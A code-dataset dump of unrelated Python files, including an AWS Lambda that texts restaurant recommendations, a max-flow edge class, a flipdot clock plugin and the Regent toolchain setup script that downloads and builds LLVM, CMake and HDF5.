\"\\n\")\n\t\t\t\t\tcontinue\t\t\t\n\n\t\t\t\t\t\t\t\n\nif __name__ == '__main__':\n\n\t# indexFile= \"D:/programe-data/database/stockHistInfoDatabase/000827_index_components.txt\"\n\t# database = \"D:/programe-data/database/stockHistInfoDatabase/stockInfo.db\"\n\tmaintainDatabase().maintainDbAll()","sub_path":"unusedCode/finaDataUpdate.py","file_name":"finaDataUpdate.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"188062131","text":"import json\nimport boto3\nimport json\nfrom elasticsearch import Elasticsearch\n\ndef getEsData(cuisine):\n query = {\n \"size\": 5,\n \"query\": {\n \"match\": {\n \"cuisine\":cuisine\n }\n }\n }\n es = Elasticsearch(['https://search-temp-fjykqtiytwbo6eomvvxvxhh4w4.us-east-1.es.amazonaws.com/'])\n result = es.search(index='example_index', body=query)\n listofrest = result['hits']['hits']\n restans = []\n for rest in listofrest:\n restans.append(rest['_source'][\"id\"])\n # print(\"This is restans : \",restans)\n return restans\n\ndef getFromDynamo(ids):\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n table = dynamodb.Table('yelp-restaurants')\n item = []\n for id in ids:\n result = table.get_item(Key={\n 'id': id\n })\n item.append(result['Item']['info'])\n return item\n\ndef sendMessage(cuisine, information, phone):\n session = boto3.Session()\n sns_client = session.client('sns')\n message = \"Your recommendations for \"+str(cuisine)+\" restaurants are \\n\"\n for i in range(len(information)):\n rec = information[i]\n # print(\"This is rec : \",rec)\n message += (str(i+1) + '. ')\n message += (rec['name'] + \" at \" + rec['address'])\n message += \"\\n\"\n if i!=len(information)-1:\n message += \" \"\n else:\n message += \".\"\n \n print(\"The message is : \",message)\n sns_client.publish(\n PhoneNumber=phone,\n Message=message,\n MessageAttributes={\n 'AWS.SNS.SMS.SenderID': {\n 'DataType': 'String',\n 'StringValue': 'SENDERID'\n },\n 'AWS.SNS.SMS.SMSType': {\n 'DataType': 'String',\n 'StringValue': 'Promotional'\n }\n }\n )\n \nqueue = 'https://sqs.us-east-1.amazonaws.com/205569651032/concierge'\n\ndef lambda_handler(event, context):\n sqs = boto3.client('sqs')\n queue_url = 'https://sqs.us-east-1.amazonaws.com/205569651032/concierge'\n # tempsqs = boto3.resource('sqs')\n # queueval = tempsqs.Queue(queue_url)\n deleteids = []\n # Receive message from SQS queue\n response = sqs.receive_message(\n QueueUrl=queue_url,\n AttributeNames=[\n 'SentTimestamp'\n ],\n MaxNumberOfMessages=1,\n MessageAttributeNames=[\n 'All'\n ], \n VisibilityTimeout=0,\n WaitTimeSeconds=0\n )\n print(\"Message has been received from sqs : \",response)\n if (response and 'Messages' in response):\n # print(response['Messages'])\n cuisine = response['Messages'][0][\"MessageAttributes\"][\"cuisine\"][\"StringValue\"]\n phone = response['Messages'][0][\"MessageAttributes\"][\"phone\"][\"StringValue\"]\n if phone[0]!='+':\n if phone[0]!='1':\n phone = \"+1\" + phone\n else:\n phone = \"+\" + phone\n print(cuisine, phone)\n ids = getEsData(cuisine)\n result = getFromDynamo(ids)\n sendMessage(cuisine,result, phone)\n sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=response[\"Messages\"][0][\"ReceiptHandle\"])\n print(result)\n return response;\n","sub_path":"backend/lambdas/lf2.py","file_name":"lf2.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"21285035","text":"\n\n#calss header\nclass _DISTRESSED():\n\tdef __init__(self,): \n\t\tself.name = \"DISTRESSED\"\n\t\tself.definitions = [u'upset or worried: ', u'having problems because of having too little money: ', u'a distressed material has been treated to make it look as if it has been used for a long time: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_distressed.py","file_name":"_distressed.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"649838920","text":"import csv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nad1 = dict()\nad1['name'] = 'Баф HAD салатовий туристичний'\nad1['category'] = 'ТУРИЗМ'\nad1['description'] = 'Баф HAD салатовий туристичний\\n\\nСамовивіз або доставка Новою Поштою\\n' \\\n 'За потреби зроблю заміри, пишіть :)'\nad1['price'] = '40'\nad1['weight'] = '0-0.5 кг'\nad1['private or business'] = '0'\nad1['state'] = '0'\nad1['number of photos'] = '2'\n\ndict_data = list()\ncsv_columns = list(ad1.keys())\ndict_data.append(ad1)\n\ncsv_file = \"Adverts.csv\"\ntry:\n with open(csv_file, 'w') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=csv_columns)\n writer.writeheader()\n for data in dict_data:\n writer.writerow(data)\nexcept IOError:\n print(\"I/O error\")\n\nprint(ad1)\n","sub_path":"olx_mindgames/advert.py","file_name":"advert.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143466398","text":"FLOATING_POINT_EPSILON = 1E-10\r\n\r\nclass FlowEdge:\r\n\r\n def __init__(self, v, w, cap):\r\n if (v < 0 or w < 0):\r\n raise Exception(\"vertex index must be a non-negative integer\")\r\n if (cap < 0):\r\n raise Exception(\"Edge capacity must be non-negative\")\r\n self.__v = v\r\n self.__w = w\r\n self.__capacity = cap\r\n self.__flow = 0.0\r\n \r\n \r\n @classmethod\r\n def fromFlow(class_object, v, w, cap, flow):\r\n obj = class_object(v,w,cap)\r\n if (v < 0 or w < 0):\r\n raise Exception(\"vertex index must be a non-negative integer\")\r\n if (cap < 0):\r\n raise Exception(\"Edge capacity must be non-negative\")\r\n if (not (flow >= 0.0)):\r\n raise Exception(\"Flow is negative\")\r\n if (not (flow <= cap)):\r\n raise Exception(\"Flow exceeds capacity\")\r\n obj.__flow = flow\r\n return obj\r\n \r\n \r\n def From(self):\r\n return self.__v\r\n\r\n def To(self):\r\n return self.__w\r\n\r\n def capacity(self):\r\n return self.__capacity\r\n\r\n def flow(self):\r\n return self.__flow\r\n\r\n def other(self, vertex):\r\n if (vertex == self.__v):\r\n return self.__w\r\n elif (vertex == self.__w):\r\n return self.__v\r\n else:\r\n raise Exception(\"Invalid endpoint\")\r\n\r\n def residualCapacityTo(self, vertex):\r\n if (vertex == self.__v):\r\n return self.__flow\r\n elif (vertex == self.__w):\r\n return self.__capacity - self.__flow\r\n else:\r\n raise Exception(\"Invalid endpoint\")\r\n\r\n def addResidualFlowTo(self, vertex, delta):\r\n if (not (delta >= 0.0)):\r\n raise Exception(\"Delta must be nonnegative\")\r\n \r\n if (vertex == self.__v):\r\n self.__flow -= delta\r\n elif (vertex == self.__w):\r\n self.__flow += delta\r\n else:\r\n raise Exception(\"Invalid endpoint\")\r\n \r\n if (abs(self.__flow) <= FLOATING_POINT_EPSILON):\r\n self.__flow = 0.0;\r\n if (abs(self.__flow - self.__capacity) <= FLOATING_POINT_EPSILON):\r\n self.__flow = self.__capacity;\r\n\r\n if (not (self.__flow >= 0.0)):\r\n raise Exception(\"Flow is negative\")\r\n if (not (self.__flow <= self.__capacity)):\r\n raise Exception(\"Flow exceeds capacity\")\r\n\r\n def __str__(self):\r\n return str(self.__v) + \"->\" +\\\r\n str(self.__w) + \" \" +\\\r\n str(self.__flow) + \"/\" +\\\r\n str(self.__capacity);\r\n","sub_path":"BaseballElimination/FlowEdge.py","file_name":"FlowEdge.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"554652964","text":"#!/usr/bin/env python\n\n# Copyright 2019 Stanford University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom __future__ import print_function\nimport argparse, hashlib, multiprocessing, os, platform, re, subprocess, sys, tempfile, traceback\n\ndef discover_llvm_version():\n if platform.node().startswith('titan'):\n return '38'\n elif os.environ.get('LMOD_SYSTEM_NAME') == 'summit': # Summit doesn't set hostname\n return '60'\n else:\n return '60'\n\ndef discover_skip_certificate_check():\n if platform.node().startswith('titan'):\n return True\n else:\n return False\n\ndef discover_conduit():\n if 'CONDUIT' in os.environ:\n return os.environ['CONDUIT']\n elif platform.node().startswith('cori'):\n return 'aries'\n elif platform.node().startswith('daint'):\n return 'aries'\n elif platform.node().startswith('excalibur'):\n return 'aries'\n elif platform.node().startswith('quartz'):\n return 'psm'\n elif platform.node().startswith('titan'):\n return 'gemini'\n elif os.environ.get('LMOD_SYSTEM_NAME') == 'summit': # Summit doesn't set hostname\n return 'ibv'\n else:\n raise Exception('Please set CONDUIT in your environment')\n\ndef gasnet_enabled():\n if 'USE_GASNET' in os.environ:\n return os.environ['USE_GASNET'] == '1'\n return platform.system() != 'Darwin'\n\ndef hdf_enabled():\n return 'USE_HDF' in os.environ and os.environ['USE_HDF'] == '1'\n\ndef check_sha256(file_path, sha256):\n with open(file_path, 'rb') as f:\n assert hashlib.sha256(f.read()).hexdigest() == sha256\n\ndef download(dest_path, url, sha256, insecure=False):\n dest_dir = os.path.dirname(dest_path)\n dest_file = os.path.basename(dest_path)\n insecure_flag = []\n if insecure:\n insecure_flag = ['--insecure']\n\n if os.path.exists(dest_path):\n check_sha256(dest_path, sha256)\n return\n\n subprocess.check_call(['curl'] + insecure_flag + ['-o', dest_path, url])\n check_sha256(dest_path, sha256)\n\ndef extract(dest_dir, archive_path, format):\n if format == 'gz':\n subprocess.check_call(['tar', 'xfz', archive_path], cwd=dest_dir)\n elif format == 'xz':\n subprocess.check_call(['tar', 'xfJ', archive_path], cwd=dest_dir)\n else:\n raise Exception('Unknown format %s' % format)\n\ndef apply_patch(dest_dir, diff_path, strip_levels=1):\n subprocess.check_call(['patch', '-p%d' % strip_levels, '-i', diff_path], cwd=dest_dir)\n\ndef git_clone(repo_dir, url, branch=None):\n if branch is not None:\n subprocess.check_call(['git', 'clone', '-b', branch, url, repo_dir])\n else:\n subprocess.check_call(['git', 'clone', url, repo_dir])\n\ndef git_update(repo_dir):\n subprocess.check_call(\n ['git', 'pull', '--ff-only'],\n cwd=repo_dir)\n\ndef build_gasnet(gasnet_dir, conduit):\n subprocess.check_call(['make', 'CONDUIT=%s' % conduit], cwd=gasnet_dir)\n\ndef build_llvm(source_dir, build_dir, install_dir, use_cmake, cmake_exe, thread_count, is_cray):\n env = None\n if is_cray:\n env = dict(list(os.environ.items()) + [\n ('CC', os.environ['HOST_CC']),\n ('CXX', os.environ['HOST_CXX']),\n ])\n if use_cmake:\n subprocess.check_call(\n [cmake_exe,\n '-DCMAKE_INSTALL_PREFIX=%s' % install_dir,\n '-DCMAKE_BUILD_TYPE=Release',\n '-DLLVM_ENABLE_ASSERTIONS=OFF',\n '-DLLVM_ENABLE_ZLIB=OFF',\n '-DLLVM_ENABLE_TERMINFO=OFF',\n '-DLLVM_ENABLE_LIBEDIT=OFF',\n source_dir],\n cwd=build_dir,\n env=env)\n else:\n subprocess.check_call(\n [os.path.join(source_dir, 'configure'),\n '--prefix=%s' % install_dir,\n '--enable-optimized',\n '--disable-assertions',\n '--disable-zlib',\n '--disable-terminfo'],\n cwd=build_dir,\n env=env)\n subprocess.check_call(['make', '-j', str(thread_count)], cwd=build_dir)\n subprocess.check_call(['make', 'install'], cwd=build_dir)\n\ndef build_terra(terra_dir, terra_branch, llvm_dir, cache, is_cray, thread_count):\n if cache:\n subprocess.check_call(['make', 'download'], cwd=terra_dir)\n return\n\n env = {}\n if terra_branch.startswith('luajit2.1'):\n # https://github.com/LuaJIT/LuaJIT/issues/484\n\n # Note: you *can't* set MACOSX_DEPLOYMENT_TARGET globally,\n # because it will break Terra build outright. It must be set\n # for LuaJIT and *only* LuaJIT, so to do that we use the PR\n # branch directly.\n env['LUAJIT_URL'] = 'https://github.com/elliottslaughter/LuaJIT.git'\n env['LUAJIT_BRANCH'] = 'patch-1'\n env.update(dict(list(os.environ.items())))\n if is_cray:\n env.update(dict([\n ('CC', os.environ['HOST_CC']),\n ('CXX', os.environ['HOST_CXX']),\n ]))\n\n flags = [\n 'LLVM_CONFIG=%s' % os.path.join(llvm_dir, 'bin', 'llvm-config'),\n 'CLANG=%s' % os.path.join(llvm_dir, 'bin', 'clang'),\n ]\n if platform.system() != 'Darwin':\n flags.append('REEXPORT_LLVM_COMPONENTS=irreader mcjit x86')\n flags.extend(['-j', str(thread_count)])\n\n subprocess.check_call(\n ['make'] + flags,\n cwd=terra_dir,\n env=env)\n\ndef build_hdf(source_dir, install_dir, thread_count, is_cray):\n env = None\n if is_cray:\n env = dict(list(os.environ.items()) + [\n ('CC', os.environ['HOST_CC']),\n ('CXX', os.environ['HOST_CXX']),\n ])\n subprocess.check_call(\n ['./configure',\n '--prefix=%s' % install_dir,\n '--enable-threadsafe',\n '--disable-hl'],\n cwd=source_dir,\n env=env)\n subprocess.check_call(['make', '-j', str(thread_count)], cwd=source_dir)\n subprocess.check_call(['make', 'install'], cwd=source_dir)\n\ndef build_regent(root_dir, use_cmake, cmake_exe,\n gasnet_dir, llvm_dir, terra_dir, hdf_dir, conduit, thread_count):\n env = dict(list(os.environ.items()) +\n ([('CONDUIT', conduit),\n ('GASNET', gasnet_dir),\n ('USE_GASNET', '1')]\n if gasnet_enabled() else []) +\n ([('HDF_ROOT', hdf_dir),\n ('USE_HDF', '1')]\n if hdf_enabled() else []) +\n [('LLVM_CONFIG', os.path.join(llvm_dir, 'bin', 'llvm-config'))]\n )\n\n subprocess.check_call(\n [os.path.join(root_dir, 'install.py'),\n '--with-terra', terra_dir,\n '--rdir', 'auto',\n '-j', str(thread_count),\n ] + (['--cmake', '--with-cmake', cmake_exe]\n if use_cmake else ['--no-cmake']),\n env=env)\n\ndef install_llvm(llvm_dir, llvm_install_dir, scratch_dir, llvm_version, llvm_use_cmake, cmake_exe, thread_count, cache, is_cray, insecure):\n try:\n os.mkdir(llvm_dir)\n except OSError:\n pass # Hope this means it already exists\n assert(os.path.isdir(llvm_dir))\n\n mirror = 'http://sapling.stanford.edu/~eslaught/llvm' # 'https://releases.llvm.org'\n if llvm_version == '35':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-3.5.2.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-3.5.2.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-3.5.2.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-3.5.2.src')\n download(llvm_tarball, '%s/3.5.2/llvm-3.5.2.src.tar.xz' % mirror, '44196156d5749eb4b4224fe471a29cc3984df92570a4a89fa859f7394fc0c575', insecure=insecure)\n download(clang_tarball, '%s/3.5.2/cfe-3.5.2.src.tar.xz' % mirror, '4feb575f74fb3a74b6245400460230141bf610f235ef3a25008cfe6137828620', insecure=insecure)\n elif llvm_version == '38':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-3.8.1.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-3.8.1.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-3.8.1.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-3.8.1.src')\n download(llvm_tarball, '%s/3.8.1/llvm-3.8.1.src.tar.xz' % mirror, '6e82ce4adb54ff3afc18053d6981b6aed1406751b8742582ed50f04b5ab475f9', insecure=insecure)\n download(clang_tarball, '%s/3.8.1/cfe-3.8.1.src.tar.xz' % mirror, '4cd3836dfb4b88b597e075341cae86d61c63ce3963e45c7fe6a8bf59bb382cdf', insecure=insecure)\n elif llvm_version == '39':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-3.9.1.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-3.9.1.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-3.9.1.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-3.9.1.src')\n download(llvm_tarball, '%s/3.9.1/llvm-3.9.1.src.tar.xz' % mirror, '1fd90354b9cf19232e8f168faf2220e79be555df3aa743242700879e8fd329ee', insecure=insecure)\n download(clang_tarball, '%s/3.9.1/cfe-3.9.1.src.tar.xz' % mirror, 'e6c4cebb96dee827fa0470af313dff265af391cb6da8d429842ef208c8f25e63', insecure=insecure)\n elif llvm_version == '60':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-6.0.1.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-6.0.1.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-6.0.1.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-6.0.1.src')\n download(llvm_tarball, '%s/6.0.1/llvm-6.0.1.src.tar.xz' % mirror, 'b6d6c324f9c71494c0ccaf3dac1f16236d970002b42bb24a6c9e1634f7d0f4e2', insecure=insecure)\n download(clang_tarball, '%s/6.0.1/cfe-6.0.1.src.tar.xz' % mirror, '7c243f1485bddfdfedada3cd402ff4792ea82362ff91fbdac2dae67c6026b667', insecure=insecure)\n else:\n assert False\n\n if not cache:\n extract(llvm_dir, llvm_tarball, 'xz')\n extract(llvm_dir, clang_tarball, 'xz')\n if llvm_version == '35':\n apply_patch(llvm_source_dir, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'llvm-3.5-gcc.patch'))\n os.rename(clang_source_dir, os.path.join(llvm_source_dir, 'tools', 'clang'))\n\n llvm_build_dir = tempfile.mkdtemp(prefix='setup_env_llvm_build', dir=scratch_dir or llvm_dir)\n os.mkdir(llvm_install_dir)\n build_llvm(llvm_source_dir, llvm_build_dir, llvm_install_dir, llvm_use_cmake, cmake_exe, thread_count, is_cray)\n\ndef install_hdf(hdf_dir, hdf_install_dir, thread_count, cache, is_cray, insecure):\n try:\n os.mkdir(hdf_dir)\n except OSError:\n pass # Hope this means it already exists\n assert(os.path.isdir(hdf_dir))\n hdf_tarball = os.path.join(hdf_dir, 'hdf5-1.10.1.tar.gz')\n hdf_source_dir = os.path.join(hdf_dir, 'hdf5-1.10.1')\n download(hdf_tarball, 'http://sapling.stanford.edu/~manolis/hdf/hdf5-1.10.1.tar.gz', '048a9d149fb99aaa1680a712963f5a78e9c43b588d0e79d55e06760ec377c172', insecure=insecure)\n if not cache:\n extract(hdf_dir, hdf_tarball, 'gz')\n build_hdf(hdf_source_dir, hdf_install_dir, thread_count, is_cray)\n\ndef print_advice(component_dir):\n print('Given the number of things that could potentially have gone')\n print('wrong, this script is not designed to handle this situation.')\n print('You will need to fix the problem on your own (or ask for help')\n print('fixing it).')\n print()\n print('The files are located here:')\n print()\n print(component_dir)\n print()\n print('Once you have fixed the problem, you have two options:')\n print()\n print(' 1. Go to the directory and rebuild it yourself. This')\n print(' script will not touch the directory again.')\n print()\n print(' 2. Remove the directory. Then rerun this script.')\n print()\n print('Good luck and please ask for help if you get stuck!')\n\ndef report_build_failure(name, component_dir, exception):\n print()\n print('#' * 68)\n print('## Build Failed')\n print('#' * 68)\n print()\n print('It appears that %s has failed to build. The failure was:' % name)\n print()\n traceback.print_exc()\n print()\n print_advice(component_dir)\n sys.exit(1)\n\ndef check_dirty_build(name, build_result, component_dir):\n if not os.path.exists(build_result):\n print()\n print('#' * 68)\n print('## Dirty Previous Build Detected')\n print('#' * 68)\n print()\n print('It appears that %s was not built successfully on a' % name)\n print('previous invocation of this script.')\n print()\n print_advice(component_dir)\n sys.exit(1)\n\ndef driver(prefix_dir=None, scratch_dir=None, cache=False,\n legion_use_cmake=False, llvm_version=None,\n terra_url=None, terra_branch=None, insecure=False):\n if not cache:\n if 'CC' not in os.environ:\n raise Exception('Please set CC in your environment')\n if 'CXX' not in os.environ:\n raise Exception('Please set CXX in your environment')\n if 'LG_RT_DIR' in os.environ:\n raise Exception('Please unset LG_RT_DIR in your environment')\n\n is_cray = 'CRAYPE_VERSION' in os.environ\n\n if not cache and is_cray:\n print('This system has been detected as a Cray system.')\n print()\n print('Note: The Cray wrappers are broken for various purposes')\n print('(particularly, dynamically linked libraries). For this')\n print('reason this script requires that HOST_CC and HOST_CXX')\n print('be set to the underlying compilers (GCC and G++, etc.).')\n print()\n if 'HOST_CC' not in os.environ:\n raise Exception('Please set HOST_CC in your environment')\n if 'HOST_CXX' not in os.environ:\n raise Exception('Please set HOST_CXX in your environment')\n\n if llvm_version == '35':\n llvm_use_cmake = False\n elif llvm_version == '38':\n llvm_use_cmake = False\n elif llvm_version == '39':\n llvm_use_cmake = True\n elif llvm_version == '60':\n llvm_use_cmake = True\n else:\n raise Exception('Unrecognized LLVM version %s' % llvm_version)\n\n root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n legion_dir = os.path.dirname(root_dir)\n\n if prefix_dir is None:\n prefix_dir = root_dir\n else:\n prefix_dir = os.path.abspath(prefix_dir)\n\n thread_count = multiprocessing.cpu_count()\n\n gasnet_release_dir = None\n conduit = None\n if gasnet_enabled():\n gasnet_dir = os.path.realpath(os.path.join(prefix_dir, 'gasnet'))\n if not os.path.exists(gasnet_dir):\n git_clone(gasnet_dir, 'https://github.com/StanfordLegion/gasnet.git')\n if not cache:\n conduit = discover_conduit()\n gasnet_release_dir = os.path.join(gasnet_dir, 'release')\n gasnet_build_result = os.path.join(\n gasnet_release_dir, '%s-conduit' % conduit,\n 'libgasnet-%s-par.a' % conduit)\n if not os.path.exists(gasnet_release_dir):\n try:\n build_gasnet(gasnet_dir, conduit)\n except Exception as e:\n report_build_failure('gasnet', gasnet_dir, e)\n else:\n check_dirty_build('gasnet', gasnet_build_result, gasnet_dir)\n assert os.path.exists(gasnet_build_result)\n\n cmake_exe = None\n try:\n cmake_version = subprocess.check_output(['cmake', '--version']).decode('utf-8')\n except:\n pass # Can't find CMake, continue to download\n else:\n m = re.match(r'cmake version (\\d+)[.](\\d+)', cmake_version)\n if m is not None and (int(m.group(1)) < 3 or int(m.group(2)) < 1):\n pass # CMake is too old, continue to download\n elif m is None:\n raise Exception('Cannot parse CMake version:\\n\\n%s' % cmake_version)\n else:\n cmake_exe = 'cmake' # CMake is ok, use it\n if cache or ((legion_use_cmake or llvm_use_cmake) and cmake_exe is None):\n cmake_stem = 'cmake-3.7.2-%s-x86_64' % platform.system()\n cmake_basename = '%s.tar.gz' % cmake_stem\n cmake_url = 'https://cmake.org/files/v3.7/%s' % cmake_basename\n if cmake_stem == 'cmake-3.7.2-Linux-x86_64':\n cmake_shasum = '0e6ec35d4fa9bf79800118916b51928b6471d5725ff36f1d0de5ebb34dcd5406'\n elif cmake_stem == 'cmake-3.7.2-Darwin-x86_64':\n cmake_shasum = '0175e97748052dfc15ebd3c0aa65286e5ec20ca22ed606ce88940e699496b03c'\n\n cmake_dir = os.path.realpath(os.path.join(prefix_dir, 'cmake'))\n cmake_install_dir = os.path.join(cmake_dir, cmake_stem)\n if not os.path.exists(cmake_dir):\n os.mkdir(cmake_dir)\n\n proc_type = subprocess.check_output(['uname', '-p']).strip()\n if proc_type != 'x86_64' and proc_type != 'i386':\n raise Exception(\"Don't know how to download CMake binary for %s\" % proc_type)\n\n cmake_tarball = os.path.join(cmake_dir, cmake_basename)\n download(cmake_tarball, cmake_url, cmake_shasum, insecure=insecure)\n extract(cmake_dir, cmake_tarball, 'gz')\n assert os.path.exists(cmake_install_dir)\n cmake_exe = os.path.join(cmake_install_dir, 'bin', 'cmake')\n\n llvm_dir = os.path.realpath(os.path.join(prefix_dir, 'llvm'))\n llvm_install_dir = os.path.join(llvm_dir, 'install')\n llvm_build_result = os.path.join(llvm_install_dir, 'bin', 'llvm-config')\n if not os.path.exists(llvm_install_dir):\n try:\n install_llvm(llvm_dir, llvm_install_dir, scratch_dir, llvm_version, llvm_use_cmake, cmake_exe, thread_count, cache, is_cray, insecure)\n except Exception as e:\n report_build_failure('llvm', llvm_dir, e)\n else:\n check_dirty_build('llvm', llvm_build_result, llvm_dir)\n if not cache:\n assert os.path.exists(llvm_build_result)\n\n terra_dir = os.path.join(prefix_dir, 'terra.build')\n terra_build_dir = os.path.join(terra_dir, 'build', 'bin')\n terra_build_result = os.path.join(terra_dir, 'release', 'bin', 'terra')\n if not os.path.exists(terra_dir):\n git_clone(terra_dir, terra_url, terra_branch)\n if not os.path.exists(terra_build_dir):\n try:\n build_terra(terra_dir, terra_branch, llvm_install_dir, cache, is_cray, thread_count)\n except Exception as e:\n report_build_failure('terra', terra_dir, e)\n else:\n check_dirty_build('terra', terra_build_result, terra_dir)\n if not cache:\n assert os.path.exists(terra_build_result)\n\n hdf_install_dir = None\n if hdf_enabled():\n hdf_dir = os.path.join(prefix_dir, 'hdf')\n hdf_install_dir = os.path.join(hdf_dir, 'install')\n hdf_build_result = os.path.join(hdf_install_dir, 'lib', 'libhdf5.so')\n if not os.path.exists(hdf_install_dir):\n try:\n install_hdf(hdf_dir, hdf_install_dir, thread_count, cache, is_cray, insecure)\n except Exception as e:\n report_build_failure('hdf', hdf_dir, e)\n else:\n check_dirty_build('hdf', hdf_build_result, hdf_dir)\n if not cache:\n assert os.path.exists(hdf_build_result)\n\n if not cache:\n build_regent(root_dir, legion_use_cmake, cmake_exe,\n gasnet_release_dir, llvm_install_dir, terra_dir, hdf_install_dir,\n conduit, thread_count)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Setup tool for Regent.')\n parser.add_argument(\n '--prefix', dest='prefix_dir', required=False,\n help='Directory in which to install dependencies.')\n parser.add_argument(\n '--scratch', dest='scratch_dir', required=False,\n help='Directory in which to store temporary build files.')\n parser.add_argument(\n '--cache-only', dest='cache', action='store_true',\n help='Only cache downloads (do not install).')\n parser.add_argument(\n '--skip-certificate-check', dest='insecure', action='store_true',\n default=discover_skip_certificate_check(),\n help='Skip certificate checks on downloads.')\n parser.add_argument(\n '--cmake', dest='legion_use_cmake', action='store_true',\n default=os.environ.get('USE_CMAKE') == 1,\n help='Use CMake to build Legion.')\n parser.add_argument(\n '--llvm-version', dest='llvm_version', required=False, choices=('35', '38', '39', '60'),\n default=discover_llvm_version(),\n help='Select LLVM version.')\n parser.add_argument(\n '--terra-url', dest='terra_url', required=False,\n default='https://github.com/StanfordLegion/terra.git',\n help='URL of Terra repository to clone from.')\n parser.add_argument(\n '--terra-branch', dest='terra_branch', required=False,\n default='luajit2.1',\n help='Branch of Terra repository to checkout.')\n args = parser.parse_args()\n driver(**vars(args))\n","sub_path":"language/scripts/setup_env.py","file_name":"setup_env.py","file_ext":"py","file_size_in_byte":21192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557957205","text":"import datetime\nfrom flask import render_template, request, redirect, url_for\nimport pytz\nfrom pyflipdot.display import TextDisplay\nfrom pyflipdot.plugins import Plugin\nfrom pyflipdot.web.admin import PluginView\nfrom pyflipdot.web.view import MenuFlaskView\nimport pyflipdot.main\n__author__ = 'teddydestodes'\n__plugin_name__ = 'Clock View'\n__version__ = '0.1'\n\nclass ClockPlugin(Plugin):\n\n def __init__(self):\n super().__init__()\n self._tz = pytz.timezone(ClockPlugin.get_config('timezone', 'Europe/Berlin'))\n self._format = ClockPlugin.get_config('format', '{day:02d}.{month:02d}.{year:04d} {hour:02d}:{minute:02d}:{second:02d}')\n\n def draw(self, display):\n if isinstance(display, TextDisplay):\n self._draw_text(display)\n\n def tick(self):\n pass\n\n def _reload(self):\n self._tz = pytz.timezone(ClockPlugin.get_config('timezone', 'Europe/Berlin'))\n self._format = ClockPlugin.get_config('format', '{day:02d}.{month:02d}.{year:04d} {hour:02d}:{minute:02d}:{second:02d}')\n\n def _draw_text(self, display):\n cdate = pytz.utc.localize(datetime.datetime.utcnow()).astimezone(self._tz)\n text = self._format.format(hour=cdate.hour, minute=cdate.minute, second=cdate.second,\n day=cdate.day, month=cdate.month, year=cdate.year)\n display.set_text(text)\n\npyflipdot.main.VIEWS['clock'] = ClockPlugin\n\nclass ClockPluginView(MenuFlaskView):\n route_base = 'clock'\n menu_name = 'Clock'\n\n def index(self):\n config = {'timezone': ClockPlugin.get_config('timezone', 'Europe/Berlin'),\n 'format': ClockPlugin.get_config('format',\n '{day:02d}.{month:02d}.{year:04d} {hour:02d}:{minute:02d}:{second:02d}')}\n return render_template('plugins/clock/clock.html', config=config)\n\n def post(self):\n ClockPlugin.set_config('timezone', request.form.get('timezone'))\n ClockPlugin.set_config('format', request.form.get('format'))\n ClockPlugin.reload()\n return redirect(url_for('ClockPluginView:index'))\n\nPluginView.clock = ClockPluginView\n","sub_path":"pyflipdot/plugins/clock/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381598644","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth import login, logout, authenticate\n# from django.contrib.auth.forms import UserCreationForm\n\nfrom .forms import UserCreateForm, UserProfileForm\n\n\ndef logout_view(request):\n \"\"\"log the user out\"\"\"\n logout(request)\n return HttpResponseRedirect(reverse('dog_vaycay:index'))\n\n\ndef register(request):\n if request.method != 'POST':\n # display 